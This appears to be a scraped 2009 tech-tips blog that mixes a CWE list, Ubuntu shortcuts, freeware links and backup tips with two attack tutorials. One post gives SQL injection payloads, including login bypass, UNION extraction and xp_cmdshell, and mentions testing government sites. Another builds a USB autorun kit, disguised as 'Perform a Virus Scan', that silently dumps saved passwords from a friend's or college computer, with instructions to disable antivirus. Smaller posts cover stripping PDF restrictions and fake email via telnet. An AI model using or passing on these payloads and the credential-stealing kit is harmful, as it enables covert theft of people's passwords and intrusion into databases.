CWE-79:Failure to Preserve Web Page Structure

CWE-78:Failure to Preserve OS Command Structure

CWE-319:Cleartext Transmission of Sensitive Information

CWE-352:Cross-Site Request Forgery

CWE-362:Race Condition

CWE-209:Error Message Information Leak

CWE-119:Failure to Constrain Operations within the Bounds of a Memory Buffer

CWE-642:External Control of Critical State Data

CWE-73:External Control of File Name or Path

CWE-665:Improper Initialization

CWE-426:Untrusted Search Path

CWE-94:Failure to Control Generation of Code

CWE-494:Download of Code Without Integrity Check

CWE-404:Improper Resource Shutdown or Release

CWE-682:Incorrect Calculation

CWE-285:Improper Access Control

CWE-327:Use of a Broken or Risky Cryptographic Algorithm

CWE-259:Hard-Coded Password

CWE-732:Insecure Permission Assignment for Critical Resource

CWE-330:Use of Insufficiently Random Values

CWE-250:Execution with Unnecessary Privileges

CWE-602:Client-Side Enforcement of Server-Side Security (ANI)

This List is produced by National Security Agency (NSA) and 30 other organisations to put forward the flaws.

Google Sync for Mobile

2009-02-14T23:54:00.000+05:30

Google Sync mainly used in Mobile phones and it began synchronising its free online calendars abd Gmail contact lists with smart phones using softwares licensed from arch-rival Microsoft.

Google Sync updates the Calendars and Gmail contacts in Iphones orWindow-based mobile devices to match changes users make using computers online and others ...

Sync uses "push technology" so many changes or addition to your calendar or contacts are reflected in your device in minutes,Google Mobile Engineer Bryan Mawhinney wrote in California's site.

It uses two-way service so that you make changes in Mobile and in Google account.

It goes by wireless connection, so that if phone gets lost the calendar and other information are storeb by Google.

Turn an old hard drive into an external drive

2009-02-14T23:49:00.001+05:30

Odds are you have spare hard drives lying around from old computers. Instead of tossing them out or letting them collect dust, you can easily turn them into DIY external hard drives and use them to backup your important files. Basically all you have to do is pick up a cheap hard drive enclosure, stuff the old drive inside, and connect it to your computer.

More details about this project
Recover Dead Hard Drive Data

What is SQL Injection ?

2009-02-14T23:43:00.001+05:30

SQL injection is the most common and videly used exploit by hackers all over the world...few days back i was just doing some SQL injection test on Indian govt sites, I was shocked to see how many imp govt sites r open to it....this is a big thread for us...a malicious hacker can do a lot of harm if he wish to.

Vocabulary:

* SQL: Server Query Language-used in web applications to interact with databases.
* SQL Injection: Method of exploiting a web application by supplying user input designed to manipulate SQL database queries.
* "Injection": You enter the injections into an html form which is sent to the web application. The application then puts you input directly into a SQL query. In advertantly, this allows you to manipulate to query...

Prerequisite:

* A background of programming and a general idea of how most hacking methods are done.

Application:

* Hacking a SQL database-driven server (usually only the ones that use unparsed user input in database queries). There is still a surprising number of data-driven web applications on the net that are vulnerable to this type of exploit. Being as typical as all method, the frequency of possible targets decreases over time as the method becomes more known. This is one those exploits that aren't easily prevented by a simple patch but by a competent programmer.

Use:
First, let's look at a typical SQL query:
SELECT fieldName1, fieldName2 FROM databaseName WHERE restrictionsToFilterWhichEntriesToReturn

Now, to dissect...
The red areas is where criterion is inputed. The rest of the query structures the query.

* SELECT fieldName1, fieldName2 - Specifies the of the names of fields that will be returned from the database.
* FROM databaseName - Specifies the name of the database to search.
* WHERE restrictionsToFilterWhichEntriesToReturn - Specifies which entries to return.

Here is an example for somebody's login script:

SELECT userAcessFlags FROM userDatabase WHERE userName="(input here)" AND userPass="(input here)"

The idea is guess what that application's query looks like and input things designed to return data other than what was intended.

In the example, input like the following could give gain access to the administrator account:

User: administrator
Pass: " OR ""="

Making the query like this:

SELECT userAcessFlags FROM userDatabase WHERE userName="administrator" AND userPass="" OR ""=""

As you can see, ""="" (nothing does indeed match nothing)
Note: Injections are rarely as simple as this...

One can be creative and use error messages to your advantadge to access other databases, fields, and entries. Learn a little SQL to use things like UNION to merges query results with ones not intended.On the security side, parse user data and get rid of any extra symbols now that you know how it's done.

The idea in this example is to break out of the quotation marks.
When stuff is inside quotation marks, the stuff isn't processed as code or anything but as a phrase and what it is.

The password injection was: " OR ""="
What this does is close the string that was started by the quotation mark in the part userPass=". Once you break out, THEN stuff is considered code. So, I put OR ""=" after I break out of the string. You will notice that it is comparing two quotation marks with one, but the quotation mark already built in by the application finishes it so we have this:
userPass="" OR ""=""
Notice how the first and last quotation marks are not colored and are not built in.

Additional notes:
This was just an extremely simplified version and you will probably need to learn a little SQL to fully understand.

Here are a few SQL terms that do other things:
UNION: You use this to merge the results of one query with another. You may put things like SELECT after UNION in order to search other databases and stuff. Sometimes you may need to use ALL in conjuction to break out of certain clauses. It does no harm so when in doubt you could do something like:
" UNION ALL SELECT 0,'','hash' FROM otherDatabase WHERE userName="admin
The key when using UNION is to make your new query return the same amount of columns in the same datatype so that you may get the results you want.

:-- This works sometimes to terminate the query so that it ignores to the rest of the stuff that might be fed afterwards if you don't like it. For example:
SELECT * FROM userDatabase WHERE userName="admin";--" AND userPass="aH0qcQOVz7e0s"

NOT IN: If you have no idea which record you want you could record cycle (you request vague info, and you put what you already got in the NOT IN clause so that you can get the next entry)
Usage:
SELECT userName userPass FROM userDatabase WHERE userName NOT IN ('Dehstil','Twistedchaos')

EXEC: This command should never work, but if it does...you win; you could do anything. For instance, you could inject something like this:
';EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:

All my examples so far have dealt with read processes. To manipulate a write process, here is an example for those who know what their doing:
INSERT INTO userProfile VALUES(''+(SELECT userPass FROM userDatabase WHERE userName='admin')+'' + 'Chicago' + 'male')
This example would theoretically put the admin's password in your profile.

Hack Passwords Using USB Drive

2009-02-14T23:24:00.005+05:30

Today we will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy theautorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Keyboard Shortcuts For Ubuntu

2009-02-14T23:21:00.001+05:30

General keyboard shortcuts

Ctrl + A = Select all
Ctrl + C = Copy the highlighted content to clipboard
Ctrl + V = Paste the clipboard content
Ctrl + N = New (Create a new document, not in terminal)
Ctrl + O = Open a document
Ctrl + S = Save the current document
Ctrl + P = Print the current document
Ctrl + W = Close the close document
Ctrl + Q = Quit the current application

Keyboard shortcuts for GNOME desktop

Ctrl + Alt + F1 = Switch to the first virtual terminal
Ctrl + Alt + F2(F3)(F4)(F5)(F6) = Select the different virtual terminals
Ctrl + Alt + F7 = Restore back to the current terminal session with X
Ctrl + Alt + Backspace = Restart GNOME
Alt + Tab = Switch between open programs
Ctrl + Alt + L = Lock the screen.
Alt + F1 = opens the Applications menu
Alt + F2 = opens the Run Application dialog box.
Alt + F3 = opens the Deskbar Applet
Alt + F4 = closes the current window.
Alt + F5 = unmaximizes the current window
Alt + F7 = move the current window
Alt + F8 = resizes the current window.
Alt + F9 = minimizes the current window.
Alt + F10 = maximizes the current window
Alt + Space = opens the window menu.
Ctrl + Alt + + = Switch to next X resolution
Ctrl + Alt + - = Switch to previous X resolution
Ctrl + Alt + Left/Right = move to the next/previous workspace

Keyboard shortcuts for Terminal

Ctrl + A = Move cursor to beginning of line
Ctrl + E = Move cursor to end of line
Ctrl + C = kills the current process.
Ctrl + Z = sends the current process to the background.
Ctrl + D = logs you out.
Ctrl + R = finds the last command matching the entered letters.
Enter a letter, followed by Tab + Tab = lists the available commands beginning with those letters.
Ctrl + U = deletes the current line.
Ctrl + K = deletes the command from the cursor right.
Ctrl + W = deletes the word before the cursor.
Ctrl + L = clears the terminal output
Shift + Ctrl + C = copy the highlighted command to the clipboard.
Shift + Ctrl + V (or Shift + Insert) = pastes the contents of the clipboard.
Alt + F = moves forward one word.
Alt + B = moves backward one word
Arrow Up/Down = browse command history
Shift + PageUp / PageDown = Scroll terminal output

Keyboard shortcuts for Compiz

Alt + Tab = switch between open windows
Win + Tab = switch between open windows with Shift Switcher or Ring Switcher effect
Win + E = Expo, show all workspace
Ctrl + Alt + Down = Film Effect
Ctrl + Alt + Left mouse button = Rotate Desktop Cube
Alt + Shift + Up = Scale Windows
Ctrl + Alt + D = Show Desktop
Win + Left mouse button = take screenshot on selected area
Win + Mousewheel = Zoom In/Out
Alt + Mousewheel = Transparent Window
Alt + F8 = Resize Window
Alt + F7 = Move Window
Win + P = Add Helper
F9 = show widget layer
Shift + F9 = show water effects
Win + Shift + Left mouse button = Fire Effects
Win + Shift + C = Clear Fire Effects
Win + Left mouse button = Annotate: Draw
Win + 1 = Start annotation
Win + 3 = End annotation
Win + S = selects windows for grouping
Win + T = Group Windows together
Win + U = Ungroup Windows
Win + Left/Right = Flip Windows

Keyboard shortcut for Nautilus

Shift + Ctrl + N = Create New Folder
Ctrl + T = Delete selected file(s) to trash
Alt + ENTER = Show File/Folder Properties
Ctrl + 1 = Toggle View As Icons
Ctrl + 2 = Toggle View As List
Shift + Right = Open Directory (Only in List View)
Shift + Left = Close Directory (Only in List View)
Ctrl + S = Select Pattern
F2 = Rename File
Ctrl + A = Select all files and folders
Ctrl + W = Close Window
Ctrl + Shift + W = Close All Nautilus Windows
Ctrl + R = Reload Nautilus Window
Alt + Up = Open parent directory
Alt + Left = Back
Alt + Right = Forward
Alt + Home = go to Home folder
Ctrl + L = go to location bar
F9 = Show sidepane
Ctrl + H = Show Hidden Files
Ctrl + + = Zoom In
Ctrl + - = Zoom Out
Ctrl + 0 = Normal Size

(For those who want to configure your own keyboard shortcuts, you can do it at System->Preferences->Keyboard Shortcuts.)

Fact You Must Know:
Google uses Ubuntu Linux(Highly Secured Os) Operating System Only.

Download WinOptimizer 4.5.1 free Full version

2009-02-14T23:18:00.001+05:30

Every PC owner know that as the time passes, Computer start up and working speed goes down. This happens because your Computer has become overweighted with lots of Junk materials, useless registry entries and many shortcuts linking nowhere. It is rather impossible than difficult to delete files and repair problems manually. So, Ashampoo Winoptimizer is a tool which will optimize you system’s performance. You can call it as overhaul or optimization tool.

Various modules will carry out their particular functions :

If your system is weighed down with too much junk, for instance, then you can always use the Drive Cleaner to remove redundant files.
Registry Optimizer will detect and delete leftover Registry entries.
Internet Cleaner will erase your browser cache, history, cookies and more.
If you’re more concerned about general performance issues then the built-in defrag tool and startup program manager will be interesting.
There’s also an internet tuner that will automatically optimise your internet connection settings.

If you think that running these tools one by one will take your more time then, Use 1-click optimization tool that scans your hard drive, Registry and settings for problems, and resolves them all in a single click.
Download WinOptimizer 4 Freeware

Firefox plugin for Ultrasurf :Anonymous web surfing.

2009-02-14T23:11:00.003+05:30

Ultrasurf is a useful software to hide your Ip address thus maintaining your online privacy helping in anonymous web surfing. As stated earlier, Ultrasurf is used to bypass firewall restrictions and even bypass Rapidshare restrictions.

Download Ultrasurf from UltraReach site or from here.

But, the disadvantage of using Ultrasurf is that it is useful for Internet Explorer users only. Hence, for making it compatible with firefox (the most popular browser among hackers), Firefox addon "WJ" is used.

What is WJ??

As stated already, WJ is a firefox addon used to make Ultrasurf compatible with Firefox. The addon makes it possible to change proxy settings for firefox. But, remember, for this addon to work properly, you should have Ultrasurf running.

On installing the addon, its presence is displayed in status bar by "WJ Enabled" or "WJ Disabled".

If you have accidently disabled it, enable it by clicking on it..

How to download this addon:

1. Run your Firefox.
2. Download the zipped addon file from:

Download WJ addon for Firefox.

3. Now unzip the downloaded file.
4. Now double click on this file and open it with firefox. It will open with firefox and a dialog box asking about addon installation.
5. Click Install and addon will be installed.
6. Restart Firefox to see the addon status in status bar.

How to use WJ:

1. Now, start Ultrasurf with addon "WJ enabled".
2. Ultrasurf will provide with 3 proxy servers.
3. Select any one of them having max speed and now your IP address is changed.
4. Done.

So guys, i hope you will enjoy anonymous web surfing with Ultrasurf. Now, no need to have proxy server list or search for free public fast proxy servers. Just Ultrasurf.

6 Free alternatives to Microsoft Office

2009-02-03T23:16:00.004+05:30

Alternatives to Microsoft office

Over the years, Microsoft Office has become the most preferred and advanced office suite. However the high price tags attached to legal and licensed copies of Microsoft Office can become a burden in the long run.

Fear no more, we recently figured lots of alternative office suites. They not maybe as comprehensive as Microsoft Office, but they still manage to get the work done. Here are my 6 alternative office suite picks.

1. Google Docs - Google Docs is probably your best bet against the monopoly of Microsoft office. Assuming you a decent internet connection, Google Docs includes a web-based Word Processor, Spreadsheet application, and a Presentation app. Best of all its free.

2. Zoho- Zoho is another great online office productivity suite. It features a word processor, spreadsheet and presentation apps, but also includes online project management, CRM solutions, web conferencing, online database with reports, online planner, group chat, wiki, and lots more. Every things online!Only thing you need is a decent connection.

3. OpenOffice - OpenOffice.org is a free and open source office suite, including word processor, spreadsheet, presentation, vector drawing and database management. It is available for many different platforms, including Microsoft Windows, Unix-like systems with the X Window System including GNU/Linux, BSD, Solaris and Mac OS X.

4. Thinkfree - ThinkFree Office is another application suite comprised of word processing, spreadsheet, and presentation graphics software-all usable online and off. Thinkfree also has advanced collaboration features such that users can share, edit, and contribute their ideas remotely.

5. StarOffice - StarOffice 8 is a full-featured office suite that contains a word processor, a spreadsheet tool, applications for presentations, databases, math formulas and drawing. It has support for most Microsoft Office formats (except for the formats introduced in Office 2007), but it can also export documents as PDF out of the box. The software normally costs $70, but it’s available for free in Google Pack.

6. Ajax Write : ajaxWrite is a web-based word processor that can read and write Microsoft Word and other standard document formats. Simply point your fav browser to ajaxwrite.com and in seconds a full-featured program will be available for you to open, edit, print and save. Best part its free.

Free Registry Mechanic License For 1 Year

2009-02-03T23:13:00.000+05:30

PC Tools Registry Mechanic is known to be an awesome tool to clean up and maintain the Windows Registry system. This ensures that the system is free of errors and in turn speeds up the CPU and memory processing capabilities of the PC. Registry Mechanic uses a very efficient algorithm in finding and identifying the problems in the registry and it comes with a FREE and Premium versions.

Premium version of Registry Mechanic costs $29.95 for 1 year license. It offers a clean and clear design for simple navigation. For a complete set of Features, visit the PC Tools website
How to Get a Free License of PC Tools Registry Mechanic?

1. Go to the Promotion Site.
2. Fill out your name, email and country and submit. Make sure you give a valid email address.
3. License details will be Mailed to you within a short time.
4. Now you have to download the correct version of Registry Mechanic because this license is valid for only a specific version of Registry Mechanic.

I have been using it for 1 year,and is very trusted!
Highly recommend

Make Windows Vista Looks Like Windows 7

2009-02-03T23:11:00.002+05:30

Windows 7 is the next generation operating system by Microsoft.Windows 7 is now at beta stage and will be released at about year 2009-2010.
Now user can try the feeling using ‘Windows 7′ by changing the theme of Windows Vista.These are the steps.
Because Windows Vista doesn’t allow user to use third-party theme,so user need to patch system files in order to use the third-party theme.User need to patch 3 system files to use third-party theme in Windows Vista.The files are:

shsvcs.dll
themeui.dll
uxtheme.dll

These are the website to download these system files:

For Windows Vista(32bit):http://www.withinwindows.com/uxthemes/Windows%20Vista/SP0/6.0.6000.16386_XX.rar

For Windows Vista(64bit):http://www.withinwindows.com/uxthemes/Windows%20Vista/SP0/6.0.6000.16386_XX_AMD64.rar

For Windows Vista(32bit) Service Pack 1:http://www.withinwindows.com/uxthemes/Windows%20Vista/SP1/6.0.6001.18000_XX.rar

For Windows Vista(64bit) Service Pack 1:http://www.withinwindows.com/uxthemes/Windows%20Vista/SP1/6.0.6001.18000_AMD64_XX.rar

After download the RAR file,extract it using WinRAR(download here) or 7-Zip(download here),you will get the three .dll file.
Highlight that 3 .dll file can right click “Take Ownership” it.

Rename that three .dll file so that user can easily copy the file.Example simply add a “backup” at last of each file name.Such as “shsvcs_backup.dll”

After that go to Windows Explorer type in “%windir%\System32″.

Copy and paste that three ‘Take Ownership-ed” .dll file in that folder.

Restart yout system.Now your system is ready to use third-party theme.

Download the third-party Windows 7 theme from:
http://www.mediafire.com/download.php?cod0z1zykoj

http://www.megashare.com/523729

Extract the zipped folder.Copy the folder(containing a .theme file and a folder containing .msstyles file) to “%windir%\Resources\Themes\” folder.

Now user can go to Personalize(right click on the desktop),click on “theme” will find a new theme from the drop-down list.Apply it.

Windows 7 Transformation Pack

2009-02-03T23:08:00.002+05:30

Windows 7 has released some days ago.Some cannot install it,either because is in beta,either they just want to stick with the good and “standard” xp/vista(me XP).So there is a transformation pack.Right now this has to be the most “clone” of windows 7.Personally i use the 1st and have no problems till now.

1. Vienna 2.5

Download Vienna 2.5 - Windows 7 Transformation Pack (Mirror)

2. HFN Windows Transformation Pack

Download HFN Windows 7 Transformation Pack

3. NSFormation Pack 1.0

Download Windows 7 Transformation pack - NSFormation (Mirror)

4. Vienna Transformation Pack v1

Download Vienna Transformation Pack v1

WARNING!
Use this pack at your OWN risk.It may affect your system and have problems.So then don’t complain on me.

Key Pass Enterprise Edition 4.7.9 Download

2009-02-03T23:07:00.000+05:30

KeyPass is a convenient tool which could be used by enterprise administrators to distribute passwords to users. Instead of forcing users to remember passwords for enterprise resources and applications, an administrator can store all of them in KeyPass, assign different read-only passwords and distribute them to users. In this way, users only need to remember one master password in order to access all enterprise resources and applications. In addition, they will only be able to use the information in KeyPass, but will not be able to modify them. Only the administrator has the authority to update the passwords in the database.

Download.
http://www.getupload.org/en/file/13060/KeyPass-Enterprise-Edition-4-7-9-rar.html

20 Free Operating Systems that are not Windows

2009-02-03T22:58:00.002+05:30

For the last few days, Windows 7 is just about the only OS anyone has been talking about. I figured it was high time for us to share the love and take a look at some other interesting free, downloadable operating systems.

we bring you a collection of 20 that are worth checking out. There are plenty more, so if you’d like to add your favorites, share them in the comments!

Fedora 10 (pictured) - One of the few live distros that didn’t have any trouble with the hardware on my MSI Wind netbook. My acid test: can it properly suspend and wake? Yes - and it does it faster than Windows XP, Vista, or Windows 7. OpenSUSE and Ubuntu both failed to resume properly.

Damn Small Linux - I wouldn’t feel right not listing Damn Small. It’s pretty amazing what you can do with a whole OS that’s not much bigger than most Windows antivirus applications. 50mb gets you Firefox, XMMS, VNCViewer, MS Office Viewer, and much more. It’s also easily extendable through the MyDSL service or by using the apt command.

Linux Mint - While it’s based on Ubuntu, Mint has some features that I think make it a bit more user-friendly. For starters, there are several easy ways to find and install new software including the dead simple Mint Software Portal. Find an app, click the install button, bada bing!

64 Studio - If you’re into digital content creation of any kind - audio, video, or graphics - 64 Studio is a distro worth downloading. It’s packed full of awesome multimedia apps and, contrary to the name, is available for 32-bit platforms as well.

live.linux-gamers.net - One of the big complaints about Linux is “Where are the games?” If you’d like to see some, why not download a live DVD that contains a truckload that you can run without even installing anything? FPS, racing, platformer, you name it - this disc has it covered.

Slax - This has always been one of my favorite light Linux distros. It’s about 200mb and includes plenty of great apps. It includes a really slick boot option as well: to act as a PXE server, allowing other machines on your LAN to boot Slax over the network.

NimbleX - If you’re looking for a lightweight base to run virtual PCs on, check out NimbleX. It’s the smallest distro I’ve seen that comes with Sun’s Virtual Box. You can even customize your ISO on the web site before you download it if you want. Awesome.

Haiku - Inspired by BeOS, Haiku strives to provide an environment that is simple enough for beginners to use, yet powerful enough for more experienced users to enjoy as well. As they say on their web site, Haiku wants to be “free of unnecessary complexities.” There’s also Zeven OS, a Linux distro with BeOS-inspired visuals.

ReactOS - Definitely an ambitious project, ReactOS is trying to produce a free, non-linux environment that is fully compatible with Windows applications and drivers. It’s got a long way to go, but it’s an interesting project to keep your eye on.

Mac-on-stick - Sure, OSX is pretty and functional, but can it fit on a 32mb flash drive? Mac-on-stick is a complete Mac OS 7.0.1 environment that runs on Windows, Mac, Linux, and even Pocket PC. Use it to run old-school apps or classic games like Dark Castle. It’s also part of the Portableapps.Com suite.

OSX86 - No, there’s no link for this one, gang. I’ve included OSX86 (which you can probably find yourself on any major torrent tracker by searching for kalyway) because it’s an amazing example of what an enthusiastic computing community can accomplish. There’s even a customized version floating around that is tailored for the MSI Wind netbook..

NetBSD - If you’re not interested in trying the Hackintosh thing, why not play around with OS X’s foundations? One of the great things about NetBSD is the amazing number of hardware platforms it can run on, including the Playstation 2 and Sega Dreamcast. You may also want to try Jibbed, a lightweight NetBSD livecd spinoff that runs XFCE4.

Open Solaris - The good folks at Sun play a big part in the development of a pretty mean free OS. Open Solaris is incredibly stable and is designed for reliability and network performance. It makes an excellent foundation for NAS devices and servers.

FreeNAS - Speaking of NAS, if you’ve got an old junker around that you’d like to turn into something useful, FreeNAS is a nice option. It’s a barebones distro based on FreeBSD and is designed to turn old hardware into simple network attached storage.

IE Application Compatibility VPC Images - More free stuff from Microsoft? The VPC images include .vhd files of XP and Vista machines that can be run inside Virtual PC to test applications in different Windows OSes with different versions of IE.

VICE - Again not technically an OS, but I’m not sure anyone is really looking to multiboot the Commodore 64 or VIC20 operating systems. The VICE emulator will also run C128, PLUS4, and PET programs.

GeeXboX - Another great use of an outdated machine is to turn it into a media server/HTPC and GeeXboX is an excellent operating system to power it. There’s even an ISO generator that runs on Mac and Windows that you can use to build a customized GeeXboX disc with different themes, languages, network settings, and more.

Untangle - Untangle is a free, open source gateway that is available as both a full-blown OS and a Windows application. The Windows “app” is a nice option if you don’t have the hardware to spare for a standalone gateway machine.

Ultimate Deployment Appliance - UDA is a slick VMWare appliance that allows you to easily serve ISO images via a PXE environment. I love it. No more griping about badly scratched Vista or XP install discs, I just boot via the LAN interface instead.

gParted - If you’re using a “questionably legal” solution like Hiren’s Boot CD to manage drive partitions, you should give gParted a try. The interface and functionality is very similar to Partition Magic, and gParted is totally free and open source.

Source

Top 200 Proxy Sites List

2009-02-02T22:05:00.003+05:30

Enable Telnet Command in Windows 7/Vista

2009-02-02T21:49:00.003+05:30

Most of you are familiar with the telnet command.It is one of the well known Windows IP Utilities .In fact the telnet command is most important for sending a fake email which i have discussed in my previous post.If you are using Windows XP the telnet command is available by default.But if you use Windows Vista the telnet command is disabled by default.

So when you try to use the telnet command in Windows Vista/7 you get the following error message.

‘telnet’ is not recognized as an internal or external command,operable program or batch file.

You get this error in Vista because unlike XP ,Vista does not support telnet command by default.So, for this you have to manually enable/turn on the telnet feature in Vista/7.

Here’s the step by step procedure to enable telnet feature (telnet command) in Windows Vista/7.

1. Go to the Control Panel.

2. Click on the sub heading Uninstall a program under the main heading Programs.

NOTE: IF you are in the Classic View click on Programs and Features.

3. Now in the left panel under the Tasks select the option Turn Windows features on or off.

4. Now a new window opens.In the new window select the following

Telnet Client
Telnet Server (optional)

5. After selecting click on OK.

Now wait for few minutes till the telnet feature is installed.Once the telnet feature is installed you can goto the command prompt and use the telnet command.System restart is not required.

Safely uninstall Linux when Dual boot is installed with Windows 7/Vista/XP

2009-02-02T21:18:00.004+05:30

When asked to most of the users “How will you uninstall Linux when it is Dual Boot installed with Windows XP/Vista/7 ?” The common answers we got was “Start Windows XP/Vista/7 and format Linux Partition“. Well they were half correct, you do have to format the Linux partition but what about the grub loader? The grub loader will still be showing you the option to boot Linux during the start up and by mistake if anybody goes for booting Linux, the system will not find any Linux on your machine and it will restart. so what can you do in this situation?

There is a simple procedure to uninstall or delete Linux completely and safely by following a step by step procedure illustrated below and it is tested by me .

Requirements:
You need a Windows XP/Vista/7 startup disk or Windows XP(verified with XP only) bootable floppy .

How to do it:

1. Boot up in Windows XP/Vista/7.

2. Start > Control Panel > Administrative Tools > Computer Management

(UAC or User Account Control in Vista/7)

3. Go to Disk Management under “Storage”

4. Select your Hard Disk and then the Linux partition.

5. Delete the Linux partition this will delete Linux and grub.

6. Now reboot your Laptop/Desktop with Windows XP start up disc or floppy and type the command “fixmbr” .

7. Above command will repair ur bootloader and rewrite ntldr which will replace corrupted grub.

8. Thats it done now boot your Laptop or Desktop normally it will be booted by default in Windows XP/Vista/7.

If you have any problem in the procedure given above leave a comment here…

Use Gmail Account to Send Emails from Multiple Addresses

2009-02-02T21:06:00.004+05:30

In this post I am going to show you how to use your Gmail account to send and receive emails from multiple addresses. Most of us own more than one email account say for example, one from Gmail, one from Yahoo and one from Hotmail. If you are tired of logging into multiple accounts to check your inbox or to send emails, I have a solution here.

Gmail has an option to integrate multiple email accounts (email addresses) into a single Gmail account. Once you integrate multiple email addresses into your Gmail account, you can use the same account to send emails from different addresses and receive emails for different addresses. Let’s take a simple example

Suppose you have three email addressess (email accounts)

1. 300allpctips@gmail.com

2. 300allpctips@yahoo.com

3. 300allpctips@hotmail.com

You can integrate the emails 300allpctips@yahoo.com and 300allpctips@hotmail.com to 300allpctips@gmail.com and operate all the three accounts from your single gmail account. Here is a step-by-step procedure to do this.

1. Login to your gmail account.

2. Click on Settings at the top right corner.

3. Under Settings, click on Accounts tab.

4. Now you’ll see the first option “Send mail as:“

5. Under this option, click on Add another email address you own

6. Now a small new window will pop-up asking you to enter the details of your new email address.

7. Here you can enter any name and any email address. The email address need not belong to gmail only. You can enter your yahoo, hotmail or any other valid email address.

8. A Verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated to your Gmail account.

Now when you compose a new email, you’ll see an option to select from multiple address to send the mail. Also you’ll receive the incoming mails for multiple addresses to a single mailbox. I hope this will benefit you.

Before you leave, I should also tell you one good advantage of this. According to Gmail privacy policy, they will not send the user’s IP address in the outgoing emails. That means when you send an email from your Gmail account , the receiver will not be able to find out your IP address. But you don’t have this advantage in Yahoo or other email providers.

Recover Dead Hard Drive Data

2009-02-01T17:02:00.002+05:30

Legend has it that if you put a dead hard drive in a freezer, pull it out and plug it in, it should run long enough to recover the data. Is it true? Indeed, it seems so.

While freezing the drive for a while extends life momentarily, the real trick is to run the hard drive while it’s in the freezer. Just throw in a water tight bag first, of course. Works pretty well with other gadgets including iPod hard drives too.

Evidence:

Two techs encounter an uncooperative drive, this is their epic recovery story.
More stories of how freezing a hard drive brought it back from the dead.

Note, this only temporarily extends the life of the device, allowing you to recover data before it completely dies.

Back Up your Hard Drive Automatically

2009-02-01T16:52:00.002+05:30

When was the last time you backed up your important files? Last year when your friend called in tears after the Blue Screen of Death ate his thesis? We thought so. Learn to set up a program called SyncBack which automatically generates password protected zip files of your important documents.

Benefits:

It’s free and pretty easy to use.
You can choose to save them to an external hard drive or upload them to an FTP server.
Schedule nightly, weekly, and monthly backups so you don’t have to lift a finger.

No, don’t just bookmark this post and do it later. Do it now! Before it’s too late! If you need assistance automating backup, see a full guide to using SyncBack

Remove PDF files Restriction on Print,Copy,Paste etc..

2009-02-01T16:29:00.003+05:30

Some PDF documents prevent the user from copying and pasting or printing it's contents. This sometimes presents a problem since the creator of the PDF file might have used a font that is not available in the system trying to read it.

Ensode contains a free online utility that allows you to upload a PDF, once uploaded, a version of the PDF without printing or copying/pasting restrictions is displayed in a new browser window.

How to Remove Restrictions on Printing & Copying - Unlock the Pdf File

Method 1

To unlock a PDF file, enter it's location in the "PDF file to unlock" field, by either typing it in the field or clicking on the "browse" button, then navigating to it's location. See Screenshot Below

Method 2

The Tricks Given by us in our previous post for hacking password protected PDF's in Remove Restrictions from PDF Files

The unlocked version of the PDF will be displayed in a new browser window, opened in the default PDF application for your system (usually Adobe Acrobat Reader).

Install Linux without Formatting or Partitioning

2009-02-01T16:25:00.000+05:30

A huge reason many people don’t want to try Linux, a free open source OS, is because it typically involves formatting or repartitioning their hard drives. Learn how to give Ubuntu a try on your Vista or XP machine without altering the original state of your hard drive.

Outstanding Uses for your Old USB Drives

2009-02-01T16:14:00.002+05:30

With 8GB sticks coming out for less than $20, it’s no wonder why our old 128mb sticks have been stuffed away in drawers, never to me used again. Learn to resurrect your old USBs and make them into a physical “key” for your computer, portable OS, and more.

Create a physical key for your computer, so it only boots when your USB is inserted.
Turn them into portable NES, SNES, Game Boy, Genesis, and arcade emulators.
Carry your own portable Linux operating systems.

For an entire list of how to reuse your old drives, see the full guide and our USB projects.